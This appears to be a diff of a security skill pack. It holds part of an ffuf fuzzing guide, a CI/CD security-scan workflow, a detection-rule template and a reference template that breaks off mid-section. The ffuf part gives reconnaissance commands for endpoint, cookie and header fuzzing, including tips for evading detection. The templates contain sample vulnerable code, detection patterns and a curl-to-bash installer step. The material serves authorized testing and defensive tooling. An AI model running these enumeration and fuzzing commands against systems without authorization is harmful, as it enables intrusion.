**Auto-Calibration:**
```bash
# Automatically filter baseline responses
ffuf -u https://target.com/FUZZ -w wordlist.txt -ac
```
## Common Patterns
### Pattern 1: API Endpoint Discovery
Discover REST API endpoints:
```bash
# Enumerate API paths
ffuf -u https://api.target.com/v1/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
-mc 200,201,401,403 \
-o api-endpoints.json
# Fuzz API versions
ffuf -u https://api.target.com/FUZZ/users \
-w <(seq 1 10 | sed 's/^/v/') \
-mc 200
```
### Pattern 2: Extension Fuzzing
Test multiple file extensions:
```bash
# Brute-force extensions on known files
ffuf -u https://target.com/admin.FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt \
-mc 200
# Or use -e flag for multiple extensions
ffuf -u https://target.com/FUZZ \
-w filenames.txt \
-e .php,.asp,.aspx,.jsp,.html,.bak,.txt
```
### Pattern 3: Rate-Limited Fuzzing
Respect rate limits and avoid detection:
```bash
# Add delay between requests
ffuf -u https://target.com/FUZZ \
-w wordlist.txt \
-p 0.5-1.0 # Random delay 0.5-1.0 seconds
# Limit concurrent requests
ffuf -u https://target.com/FUZZ \
-w wordlist.txt \
-t 5 # Only 5 concurrent threads
```
### Pattern 4: Custom Header Fuzzing
Fuzz HTTP headers for security misconfigurations:
```bash
# Fuzz custom headers
ffuf -u https://target.com/admin \
-w headers.txt:HEADER \
-H "HEADER: true" \
-mc all
# Fuzz header values
ffuf -u https://target.com/admin \
-H "X-Forwarded-For: FUZZ" \
-w /usr/share/seclists/Fuzzing/IPs.txt \
-mc 200
```
### Pattern 5: Cookie Fuzzing
Test cookie-based authentication and session management:
```bash
# Fuzz cookie values
ffuf -u https://target.com/dashboard \
-b "session=FUZZ" \
-w session-tokens.txt \
-mc 200
# Fuzz cookie names
ffuf -u https://target.com/admin \
-b "FUZZ=admin" \
-w cookie-names.txt
```
## Output Formats
Save results in multiple formats:
```bash
# JSON output (recommended for parsing)
ffuf -u https://target.com/FUZZ -w wordlist.txt -o results.json -of json
# CSV output
ffuf -u https://target.com/FUZZ -w wordlist.txt -o results.csv -of csv
# HTML report
ffuf -u https://target.com/FUZZ -w wordlist.txt -o results.html -of html
# All formats
ffuf -u https://target.com/FUZZ -w wordlist.txt -o results -of all
```
## Security Considerations
- **Sensitive Data Handling**: Discovered files may contain credentials, API keys, or PII. Handle findings securely and report responsibly
- **Access Control**: Only fuzz applications with proper authorization. Obtain written permission before testing third-party systems
- **Audit Logging**: Log all fuzzing activities including targets, wordlists used, and findings for compliance and audit trails
- **Compliance**: Ensure fuzzing activities comply with bug bounty program rules, penetration testing agreements, and legal requirements
- **Safe Defaults**: Use reasonable rate limits to avoid DoS conditions. Start with small wordlists before scaling up
## Integration Points
### Reconnaissance Workflow
1. Subdomain enumeration (amass, subfinder)
2. Port scanning (nmap)
3. Service identification
4. **ffuf directory/file enumeration**
5. Content discovery and analysis
6. Vulnerability scanning
### CI/CD Security Testing
Integrate ffuf into automated security pipelines:
```bash
# CI/CD script
#!/bin/bash
set -e
# Run directory enumeration
ffuf -u https://staging.example.com/FUZZ \
-w /wordlists/common.txt \
-mc 200,403 \
-o ffuf-results.json \
-of json
# Parse results and fail if sensitive files found
if grep -q "/.git/\|/backup/" ffuf-results.json; then
echo "ERROR: Sensitive files exposed!"
exit 1
fi
```
### Integration with Burp Suite
1. Use Burp to identify target endpoints
2. Export interesting requests
3. Convert to ffuf commands for automated fuzzing
4. Import ffuf results back to Burp for manual testing
## Troubleshooting
### Issue: Too Many False Positives
**Solution**: Use auto-calibration or manual filtering:
```bash
# Auto-calibration
ffuf -u https://target.com/FUZZ -w wordlist.txt -ac
# Manual filtering by size
ffuf -u https://target.com/FUZZ -w wordlist.txt -fs 1234,5678
```
### Issue: Rate Limiting or Blocking
**Solution**: Reduce concurrency and add delays:
```bash
ffuf -u https://target.com/FUZZ \
-w wordlist.txt \
-t 1 \
-p 2.0 \
-H "User-Agent: Mozilla/5.0..."
```
### Issue: Large Wordlist Takes Too Long
**Solution**: Start with smaller, targeted wordlists:
```bash
# Use top 1000 instead of full list
head -1000 /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt > small.txt
ffuf -u https://target.com/FUZZ -w small.txt
```
### Issue: Missing Discovered Content
**Solution**: Test with multiple extensions and match codes:
```bash
ffuf -u https://target.com/FUZZ \
-w wordlist.txt \
-e .php,.html,.txt,.asp,.aspx,.jsp \
-mc all \
-fc 404
```
## OWASP Testing Integration
Map ffuf usage to OWASP Testing Guide categories:
- **WSTG-CONF-04**: Review Old Backup and Unreferenced Files
- **WSTG-CONF-05**: Enumerate Infrastructure and Application Admin Interfaces
- **WSTG-CONF-06**: Test HTTP Methods
- **WSTG-IDENT-01**: Test Role Definitions (directory enumeration)
- **WSTG-ATHZ-01**: Test Directory Traversal/File Include
- **WSTG-INPVAL-01**: Test for Reflected Cross-site Scripting
- **WSTG-INPVAL-02**: Test for Stored Cross-site Scripting
## References
- [ffuf GitHub Repository](https://github.com/ffuf/ffuf)
- [SecLists Wordlists](https://github.com/danielmiessler/SecLists)
- [OWASP Web Security Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)

View File

@@ -0,0 +1,9 @@
# Assets Directory
Place files that will be used in the output Claude produces:
- Templates
- Configuration files
- Images/logos
- Boilerplate code
These files are NOT loaded into context but copied/modified in output.

View File

@@ -0,0 +1,357 @@
# Security-Enhanced CI/CD Pipeline Template
#
# This template demonstrates security best practices for CI/CD pipelines.
# Adapt this template to your specific security tool and workflow needs.
#
# Key Security Features:
# - SAST (Static Application Security Testing)
# - Dependency vulnerability scanning
# - Secrets detection
# - Infrastructure-as-Code security scanning
# - Container image scanning
# - Security artifact uploading for compliance
name: Security Scan Pipeline
on:
push:
branches: [main, develop]
pull_request:
branches: [main, develop]
schedule:
# Run weekly security scans on Sunday at 2 AM UTC
- cron: '0 2 * * 0'
workflow_dispatch: # Allow manual trigger
# Security: Restrict permissions to minimum required
permissions:
contents: read
security-events: write # For uploading SARIF results
pull-requests: write # For commenting on PRs
env:
# Configuration
SECURITY_SCAN_FAIL_ON: 'critical,high' # Fail build on these severities
REPORT_DIR: 'security-reports'
jobs:
# Job 1: Static Application Security Testing (SAST)
sast-scan:
name: SAST Security Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history for better analysis
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Run SAST Scanner
run: |
# Example: Using Semgrep for SAST
pip install semgrep
semgrep --config=auto \
--json \
--output ${{ env.REPORT_DIR }}/sast-results.json \
. || true
# Alternative: Bandit for Python projects
# pip install bandit
# bandit -r . -f json -o ${{ env.REPORT_DIR }}/bandit-results.json
- name: Process SAST Results
run: |
# Parse results and fail on critical/high severity
python3 -c "
import json
import sys
with open('${{ env.REPORT_DIR }}/sast-results.json') as f:
results = json.load(f)
critical = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'ERROR'])
high = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'WARNING'])
print(f'Critical findings: {critical}')
print(f'High findings: {high}')
if critical > 0:
print('❌ Build failed: Critical security issues found')
sys.exit(1)
elif high > 0:
print('⚠️ Warning: High severity issues found')
# Optionally fail on high severity
# sys.exit(1)
else:
print('✅ No critical security issues found')
"
- name: Upload SAST Results
if: always()
uses: actions/upload-artifact@v4
with:
name: sast-results
path: ${{ env.REPORT_DIR }}/sast-results.json
retention-days: 30
# Job 2: Dependency Vulnerability Scanning
dependency-scan:
name: Dependency Vulnerability Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Scan Python Dependencies
if: hashFiles('requirements.txt') != ''
run: |
pip install safety
safety check \
--json \
--output ${{ env.REPORT_DIR }}/safety-results.json \
|| true
- name: Scan Node Dependencies
if: hashFiles('package.json') != ''
run: |
npm audit --json > ${{ env.REPORT_DIR }}/npm-audit.json || true
- name: Process Dependency Results
run: |
# Check for critical vulnerabilities
if [ -f "${{ env.REPORT_DIR }}/safety-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/safety-results.json')); print(len([v for v in data.get('vulnerabilities', []) if v.get('severity', '').lower() == 'critical']))")
echo "Critical vulnerabilities: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "❌ Build failed: Critical vulnerabilities in dependencies"
exit 1
fi
fi
- name: Upload Dependency Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: dependency-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 3: Secrets Detection
secrets-scan:
name: Secrets Detection
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history to scan all commits
- name: Run Gitleaks
uses: gitleaks/gitleaks-action@v2
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
GITLEAKS_ENABLE_SUMMARY: true
- name: Alternative - TruffleHog Scan
if: false # Set to true to enable
run: |
pip install truffleHog
trufflehog --json --regex --entropy=True . \
> ${{ env.REPORT_DIR }}/trufflehog-results.json || true
- name: Upload Secrets Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: secrets-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 4: Container Image Scanning
container-scan:
name: Container Image Security Scan
runs-on: ubuntu-latest
if: hashFiles('Dockerfile') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Build Docker Image
run: |
docker build -t app:${{ github.sha }} .
- name: Run Trivy Scanner
uses: aquasecurity/trivy-action@master
with:
image-ref: app:${{ github.sha }}
format: 'sarif'
output: '${{ env.REPORT_DIR }}/trivy-results.sarif'
severity: 'CRITICAL,HIGH'
- name: Upload Trivy Results to GitHub Security
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: '${{ env.REPORT_DIR }}/trivy-results.sarif'
- name: Upload Container Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: container-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 5: Infrastructure-as-Code Security Scanning
iac-scan:
name: IaC Security Scan
runs-on: ubuntu-latest
if: hashFiles('**/*.tf', '**/*.yaml', '**/*.yml') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run Checkov
run: |
pip install checkov
checkov -d . \
--output json \
--output-file ${{ env.REPORT_DIR }}/checkov-results.json \
--quiet \
|| true
- name: Run tfsec (for Terraform)
if: hashFiles('**/*.tf') != ''
run: |
curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash
tfsec . \
--format json \
--out ${{ env.REPORT_DIR }}/tfsec-results.json \
|| true
- name: Process IaC Results
run: |
# Fail on critical findings
if [ -f "${{ env.REPORT_DIR }}/checkov-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/checkov-results.json')); print(data.get('summary', {}).get('failed', 0))")
echo "Failed checks: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "⚠️ Warning: IaC security issues found"
# Optionally fail the build
# exit 1
fi
fi
- name: Upload IaC Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: iac-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 6: Security Report Generation and Notification
security-report:
name: Generate Security Report
runs-on: ubuntu-latest
needs: [sast-scan, dependency-scan, secrets-scan]
if: always()
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Download All Scan Results
uses: actions/download-artifact@v4
with:
path: all-results/
- name: Generate Consolidated Report
run: |
# Consolidate all security scan results
mkdir -p consolidated-report
cat > consolidated-report/security-summary.md << 'EOF'
# Security Scan Summary
**Scan Date**: $(date -u +"%Y-%m-%d %H:%M:%S UTC")
**Commit**: ${{ github.sha }}
**Branch**: ${{ github.ref_name }}
## Scan Results
### SAST Scan
See artifacts: `sast-results`
### Dependency Scan
See artifacts: `dependency-scan-results`
### Secrets Scan
See artifacts: `secrets-scan-results`
### Container Scan
See artifacts: `container-scan-results`
### IaC Scan
See artifacts: `iac-scan-results`
---
For detailed results, download scan artifacts from this workflow run.
EOF
- name: Comment on PR (if applicable)
if: github.event_name == 'pull_request'
uses: actions/github-script@v7
with:
script: |
const fs = require('fs');
const report = fs.readFileSync('consolidated-report/security-summary.md', 'utf8');
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: report
});
- name: Upload Consolidated Report
if: always()
uses: actions/upload-artifact@v4
with:
name: consolidated-security-report
path: consolidated-report/
retention-days: 90
# Security Best Practices Demonstrated:
#
# 1. ✅ Minimal permissions (principle of least privilege)
# 2. ✅ Multiple security scan types (defense in depth)
# 3. ✅ Fail-fast on critical findings
# 4. ✅ Secrets detection across full git history
# 5. ✅ Container image scanning before deployment
# 6. ✅ IaC scanning for misconfigurations
# 7. ✅ Artifact retention for compliance audit trail
# 8. ✅ SARIF format for GitHub Security integration
# 9. ✅ Scheduled scans for continuous monitoring
# 10. ✅ PR comments for developer feedback
#
# Compliance Mappings:
# - SOC 2: CC6.1, CC6.6, CC7.2 (Security monitoring and logging)
# - PCI-DSS: 6.2, 6.5 (Secure development practices)
# - NIST: SA-11 (Developer Security Testing)
# - OWASP: Integrated security testing throughout SDLC

View File

@@ -0,0 +1,355 @@
# Security Rule Template
#
# This template demonstrates how to structure security rules/policies.
# Adapt this template to your specific security tool (Semgrep, OPA, etc.)
#
# Rule Structure Best Practices:
# - Clear rule ID and metadata
# - Severity classification
# - Framework mappings (OWASP, CWE)
# - Remediation guidance
# - Example vulnerable and fixed code
rules:
# Example Rule 1: SQL Injection Detection
- id: sql-injection-string-concatenation
metadata:
name: "SQL Injection via String Concatenation"
description: "Detects potential SQL injection vulnerabilities from string concatenation in SQL queries"
severity: "HIGH"
category: "security"
subcategory: "injection"
# Security Framework Mappings
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-89: SQL Injection"
mitre_attack:
- "T1190: Exploit Public-Facing Application"
# Compliance Standards
compliance:
- "PCI-DSS 6.5.1: Injection flaws"
- "NIST 800-53 SI-10: Information Input Validation"
# Confidence and Impact
confidence: "HIGH"
likelihood: "HIGH"
impact: "HIGH"
# References
references:
- "https://owasp.org/www-community/attacks/SQL_Injection"
- "https://cwe.mitre.org/data/definitions/89.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"
# Languages this rule applies to
languages:
- python
- javascript
- java
- go
# Detection Pattern (example using Semgrep-style syntax)
pattern-either:
- pattern: |
cursor.execute($SQL + $VAR)
- pattern: |
cursor.execute(f"... {$VAR} ...")
- pattern: |
cursor.execute("..." + $VAR + "...")
# What to report when found
message: |
Potential SQL injection vulnerability detected. SQL query is constructed using
string concatenation or f-strings with user input. This allows attackers to
inject malicious SQL code.
Use parameterized queries instead:
- Python: cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
- JavaScript: db.query("SELECT * FROM users WHERE id = $1", [userId])
See: https://owasp.org/www-community/attacks/SQL_Injection
# Suggested fix (auto-fix if supported)
fix: |
Use parameterized queries with placeholders
# Example vulnerable code
examples:
- vulnerable: |
# Vulnerable: String concatenation
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
- fixed: |
# Fixed: Parameterized query
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# Example Rule 2: Hardcoded Secrets Detection
- id: hardcoded-secret-credential
metadata:
name: "Hardcoded Secret or Credential"
description: "Detects hardcoded secrets, API keys, passwords, or tokens in source code"
severity: "CRITICAL"
category: "security"
subcategory: "secrets"
owasp:
- "A07:2021 - Identification and Authentication Failures"
cwe:
- "CWE-798: Use of Hard-coded Credentials"
- "CWE-259: Use of Hard-coded Password"
compliance:
- "PCI-DSS 8.2.1: Use of strong cryptography"
- "SOC 2 CC6.1: Logical access controls"
- "GDPR Article 32: Security of processing"
confidence: "MEDIUM"
likelihood: "HIGH"
impact: "CRITICAL"
references:
- "https://cwe.mitre.org/data/definitions/798.html"
- "https://owasp.org/www-community/vulnerabilities/Use_of_hard-coded_password"
languages:
- python
- javascript
- java
- go
- ruby
pattern-either:
- pattern: |
password = "..."
- pattern: |
api_key = "..."
- pattern: |
secret = "..."
- pattern: |
token = "..."
pattern-not: |
$VAR = ""
message: |
Potential hardcoded secret detected. Hardcoding credentials in source code
is a critical security vulnerability that can lead to unauthorized access
if the code is exposed.
Use environment variables or a secrets management system instead:
- Python: os.environ.get('API_KEY')
- Node.js: process.env.API_KEY
- Secrets Manager: AWS Secrets Manager, HashiCorp Vault, etc.
See: https://cwe.mitre.org/data/definitions/798.html
examples:
- vulnerable: |
# Vulnerable: Hardcoded API key
api_key = "sk-1234567890abcdef"
api.authenticate(api_key)
- fixed: |
# Fixed: Environment variable
import os
api_key = os.environ.get('API_KEY')
if not api_key:
raise ValueError("API_KEY environment variable not set")
api.authenticate(api_key)
# Example Rule 3: XSS via Unsafe HTML Rendering
- id: xss-unsafe-html-rendering
metadata:
name: "Cross-Site Scripting (XSS) via Unsafe HTML"
description: "Detects unsafe HTML rendering that could lead to XSS vulnerabilities"
severity: "HIGH"
category: "security"
subcategory: "xss"
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-79: Cross-site Scripting (XSS)"
- "CWE-80: Improper Neutralization of Script-Related HTML Tags"
compliance:
- "PCI-DSS 6.5.7: Cross-site scripting"
- "NIST 800-53 SI-10: Information Input Validation"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://owasp.org/www-community/attacks/xss/"
- "https://cwe.mitre.org/data/definitions/79.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
languages:
- javascript
- typescript
- jsx
- tsx
pattern-either:
- pattern: |
dangerouslySetInnerHTML={{__html: $VAR}}
- pattern: |
innerHTML = $VAR
message: |
Potential XSS vulnerability detected. Setting HTML content directly from
user input without sanitization can allow attackers to inject malicious
JavaScript code.
Use one of these safe alternatives:
- React: Use {userInput} for automatic escaping
- DOMPurify: const clean = DOMPurify.sanitize(dirty);
- Framework-specific sanitizers
See: https://owasp.org/www-community/attacks/xss/
examples:
- vulnerable: |
// Vulnerable: Unsanitized HTML
function UserComment({ comment }) {
return <div dangerouslySetInnerHTML={{__html: comment}} />;
}
- fixed: |
// Fixed: Sanitized with DOMPurify
import DOMPurify from 'dompurify';
function UserComment({ comment }) {
const sanitized = DOMPurify.sanitize(comment);
return <div dangerouslySetInnerHTML={{__html: sanitized}} />;
}
# Example Rule 4: Insecure Cryptography
- id: weak-cryptographic-algorithm
metadata:
name: "Weak Cryptographic Algorithm"
description: "Detects use of weak or deprecated cryptographic algorithms"
severity: "HIGH"
category: "security"
subcategory: "cryptography"
owasp:
- "A02:2021 - Cryptographic Failures"
cwe:
- "CWE-327: Use of a Broken or Risky Cryptographic Algorithm"
- "CWE-326: Inadequate Encryption Strength"
compliance:
- "PCI-DSS 4.1: Use strong cryptography"
- "NIST 800-53 SC-13: Cryptographic Protection"
- "GDPR Article 32: Security of processing"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://cwe.mitre.org/data/definitions/327.html"
- "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/"
languages:
- python
- javascript
- java
pattern-either:
- pattern: |
hashlib.md5(...)
- pattern: |
hashlib.sha1(...)
- pattern: |
crypto.createHash('md5')
- pattern: |
crypto.createHash('sha1')
message: |
Weak cryptographic algorithm detected (MD5 or SHA1). These algorithms are
considered cryptographically broken and should not be used for security purposes.
Use strong alternatives:
- For hashing: SHA-256, SHA-384, or SHA-512
- For password hashing: bcrypt, argon2, or PBKDF2
- Python: hashlib.sha256()
- Node.js: crypto.createHash('sha256')
See: https://cwe.mitre.org/data/definitions/327.html
examples:
- vulnerable: |
# Vulnerable: MD5 hash
import hashlib
hash_value = hashlib.md5(data).hexdigest()
- fixed: |
# Fixed: SHA-256 hash
import hashlib
hash_value = hashlib.sha256(data).hexdigest()
# Rule Configuration
configuration:
# Global settings
enabled: true
severity_threshold: "MEDIUM" # Report findings at MEDIUM severity and above
# Performance tuning
max_file_size_kb: 1024
exclude_patterns:
- "test/*"
- "tests/*"
- "node_modules/*"
- "vendor/*"
- "*.min.js"
# False positive reduction
confidence_threshold: "MEDIUM" # Only report findings with MEDIUM confidence or higher
# Rule Metadata Schema
# This section documents the expected structure for rules
metadata_schema:
required:
- id: "Unique identifier for the rule (kebab-case)"
- name: "Human-readable rule name"
- description: "What the rule detects"
- severity: "CRITICAL | HIGH | MEDIUM | LOW | INFO"
- category: "security | best-practice | performance"
optional:
- subcategory: "Specific type (injection, xss, secrets, etc.)"
- owasp: "OWASP Top 10 mappings"
- cwe: "CWE identifier(s)"
- mitre_attack: "MITRE ATT&CK technique(s)"
- compliance: "Compliance standard references"
- confidence: "Detection confidence level"
- likelihood: "Likelihood of exploitation"
- impact: "Potential impact if exploited"
- references: "External documentation links"
# Usage Instructions:
#
# 1. Copy this template when creating new security rules
# 2. Update metadata fields with appropriate framework mappings
# 3. Customize detection patterns for your tool (Semgrep, OPA, etc.)
# 4. Provide clear remediation guidance in the message field
# 5. Include both vulnerable and fixed code examples
# 6. Test rules on real codebases before deployment
#
# Best Practices:
# - Map to multiple frameworks (OWASP, CWE, MITRE ATT&CK)
# - Include compliance standard references
# - Provide actionable remediation guidance
# - Show code examples (vulnerable vs. fixed)
# - Tune confidence levels to reduce false positives
# - Exclude test directories to reduce noise

View File

@@ -0,0 +1,550 @@
# Reference Document Template
This file demonstrates how to structure detailed reference material that Claude loads on-demand.
**When to use this reference**: Include a clear statement about when Claude should consult this document.
For example: "Consult this reference when analyzing Python code for security vulnerabilities and needing detailed remediation patterns."
**Document purpose**: Briefly explain what this reference provides that's not in SKILL.md.
---
## Table of Contents
**For documents >100 lines, always include a table of contents** to help Claude navigate quickly.
- [When to Use References](#when-to-use-references)
- [Document Organization](#document-organization)
- [Detailed Technical Content](#detailed-technical-content)
- [Security Framework Mappings](#security-framework-mappings)
- [OWASP Top 10](#owasp-top-10)
- [CWE Mappings](#cwe-mappings)
- [MITRE ATT&CK](#mitre-attck)
- [Remediation Patterns](#remediation-patterns)
- [Advanced Configuration](#advanced-configuration)
- [Examples and Code Samples](#examples-and-code-samples)
---
## When to Use References
**Move content from SKILL.md to references/** when:
1. **Content exceeds 100 lines** - Keep SKILL.md concise
2. **Framework-specific details** - Detailed OWASP/CWE/MITRE mappings
3. **Advanced user content** - Deep technical details for expert users
4. **Lookup-oriented content** - Rule libraries, configuration matrices, comprehensive lists
5. **Language-specific patterns** - Separate files per language/framework
6. **Historical context** - Old patterns and deprecated approaches
**Keep in SKILL.md**:
- Core workflows (top 3-5 use cases)
- Decision points and branching logic
- Quick start guidance
- Essential security considerations
---
## Document Organization
### Structure for Long Documents
For references >100 lines:
```markdown
# Title
**When to use**: Clear trigger statement
**Purpose**: What this provides
## Table of Contents
- Links to all major sections
## Quick Reference
- Key facts or commands for fast lookup
## Detailed Content
- Comprehensive information organized logically
## Framework Mappings
- OWASP, CWE, MITRE ATT&CK references
## Examples
- Code samples and patterns
```
### Section Naming Conventions
- Use **imperative** or **declarative** headings
- ✅ "Detecting SQL Injection" not "How to detect SQL Injection"
- ✅ "Common Patterns" not "These are common patterns"
- Make headings **searchable** and **specific**
---
## Detailed Technical Content
This section demonstrates the type of detailed content that belongs in references rather than SKILL.md.
### Example: Comprehensive Vulnerability Detection
#### SQL Injection Detection Patterns
**Pattern 1: String Concatenation in Queries**
```python
# Vulnerable pattern
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
# Detection criteria:
# - SQL keyword (SELECT, INSERT, UPDATE, DELETE)
# - String concatenation operator (+, f-string)
# - Variable user input (request params, form data)
# Severity: HIGH
# CWE: CWE-89
# OWASP: A03:2021 - Injection
```
**Remediation**:
```python
# Fixed: Parameterized query
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# OR using ORM
user = User.objects.get(id=user_id)
```
**Pattern 2: Unsafe String Formatting**
```python
# Vulnerable patterns
query = f"SELECT * FROM users WHERE name = '{username}'"
query = "SELECT * FROM users WHERE name = '%s'" % username
query = "SELECT * FROM users WHERE name = '{}'".format(username)
# All three patterns are vulnerable to SQL injection
```
#### Cross-Site Scripting (XSS) Detection
**Pattern 1: Unescaped Output in Templates**
```javascript
// Vulnerable: Direct HTML injection
element.innerHTML = userInput;
document.write(userInput);
// Vulnerable: React dangerouslySetInnerHTML
<div dangerouslySetInnerHTML={{__html: userComment}} />
// Detection criteria:
# - Direct DOM manipulation (innerHTML, document.write)
# - React dangerouslySetInnerHTML with user data
# - Template engines with autoescaping disabled
// Severity: HIGH
// CWE: CWE-79
// OWASP: A03:2021 - Injection
```
**Remediation**:
```javascript
// Fixed: Escaped output
element.textContent = userInput; // Auto-escapes
// Fixed: Sanitization library
import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(userComment);
<div dangerouslySetInnerHTML={{__html: clean}} />
```
---
## Security Framework Mappings
This section provides comprehensive security framework mappings for findings.
### OWASP Top 10
Map security findings to OWASP Top 10 (2021) categories:
| Category | Title | Common Vulnerabilities |
|----------|-------|----------------------|
| **A01:2021** | Broken Access Control | Authorization bypass, privilege escalation, IDOR |
| **A02:2021** | Cryptographic Failures | Weak crypto, plaintext storage, insecure TLS |
| **A03:2021** | Injection | SQL injection, XSS, command injection, LDAP injection |
| **A04:2021** | Insecure Design | Missing security controls, threat modeling gaps |
| **A05:2021** | Security Misconfiguration | Default configs, verbose errors, unnecessary features |
| **A06:2021** | Vulnerable Components | Outdated libraries, unpatched dependencies |
| **A07:2021** | Auth & Session Failures | Weak passwords, session fixation, missing MFA |
| **A08:2021** | Software & Data Integrity | Unsigned updates, insecure CI/CD, deserialization |
| **A09:2021** | Logging & Monitoring Failures | Insufficient logging, no alerting, log injection |
| **A10:2021** | SSRF | Server-side request forgery, unvalidated redirects |
**Usage**: When reporting findings, map to primary OWASP category and reference the identifier (e.g., "A03:2021 - Injection").
### CWE Mappings
Map to relevant Common Weakness Enumeration categories for precise vulnerability classification:
#### Injection Vulnerabilities
- **CWE-78**: OS Command Injection
- **CWE-79**: Cross-site Scripting (XSS)
- **CWE-89**: SQL Injection
- **CWE-90**: LDAP Injection
- **CWE-91**: XML Injection
- **CWE-94**: Code Injection
#### Authentication & Authorization
- **CWE-287**: Improper Authentication
- **CWE-288**: Authentication Bypass Using Alternate Path
- **CWE-290**: Authentication Bypass by Spoofing
- **CWE-294**: Authentication Bypass by Capture-replay
- **CWE-306**: Missing Authentication for Critical Function
- **CWE-307**: Improper Restriction of Excessive Authentication Attempts
- **CWE-352**: Cross-Site Request Forgery (CSRF)
#### Cryptographic Issues
- **CWE-256**: Plaintext Storage of Password
- **CWE-259**: Use of Hard-coded Password
- **CWE-261**: Weak Encoding for Password
- **CWE-321**: Use of Hard-coded Cryptographic Key
- **CWE-326**: Inadequate Encryption Strength
- **CWE-327**: Use of Broken or Risky Cryptographic Algorithm
- **CWE-329**: Not Using a Random IV with CBC Mode
- **CWE-798**: Use of Hard-coded Credentials
#### Input Validation
- **CWE-20**: Improper Input Validation
- **CWE-73**: External Control of File Name or Path
- **CWE-434**: Unrestricted Upload of File with Dangerous Type
- **CWE-601**: URL Redirection to Untrusted Site
#### Sensitive Data Exposure
- **CWE-200**: Information Exposure
- **CWE-209**: Information Exposure Through Error Message
- **CWE-312**: Cleartext Storage of Sensitive Information
- **CWE-319**: Cleartext Transmission of Sensitive Information
- **CWE-532**: Information Exposure Through Log Files
**Usage**: Include CWE identifier in all vulnerability reports for standardized classification.
### MITRE ATT&CK
Reference relevant tactics and techniques for threat context:
#### Initial Access (TA0001)
- **T1190**: Exploit Public-Facing Application
- **T1133**: External Remote Services
- **T1078**: Valid Accounts
#### Execution (TA0002)
- **T1059**: Command and Scripting Interpreter
- **T1203**: Exploitation for Client Execution
#### Persistence (TA0003)
- **T1098**: Account Manipulation
- **T1136**: Create Account
- **T1505**: Server Software Component
#### Privilege Escalation (TA0004)
- **T1068**: Exploitation for Privilege Escalation
- **T1548**: Abuse Elevation Control Mechanism
#### Defense Evasion (TA0005)
- **T1027**: Obfuscated Files or Information
- **T1140**: Deobfuscate/Decode Files or Information
- **T1562**: Impair Defenses
#### Credential Access (TA0006)
- **T1110**: Brute Force
- **T1555**: Credentials from Password Stores
- **T1552**: Unsecured Credentials
#### Discovery (TA0007)
- **T1083**: File and Directory Discovery
- **T1046**: Network Service Scanning
#### Collection (TA0009)
- **T1005**: Data from Local System
- **T1114**: Email Collection
#### Exfiltration (TA0010)
- **T1041**: Exfiltration Over C2 Channel
- **T1567**: Exfiltration Over Web Service
**Usage**: When identifying vulnerabilities, consider which ATT&CK techniques an attacker could use to exploit them.
---
## Remediation Patterns
This section provides specific remediation guidance for common vulnerability types.
### SQL Injection Remediation
**Step 1: Identify vulnerable queries**
- Search for string concatenation in SQL queries
- Check for f-strings or format() with SQL keywords
- Review all database interaction code
**Step 2: Apply parameterized queries**
```python
# Python with sqlite3
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
# Python with psycopg2 (PostgreSQL)
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
# Python with SQLAlchemy (ORM)
from sqlalchemy import text
result = session.execute(text("SELECT * FROM users WHERE id = :id"), {"id": user_id})
```
**Step 3: Validate and sanitize input** (defense in depth)
```python
import re
# Validate input format
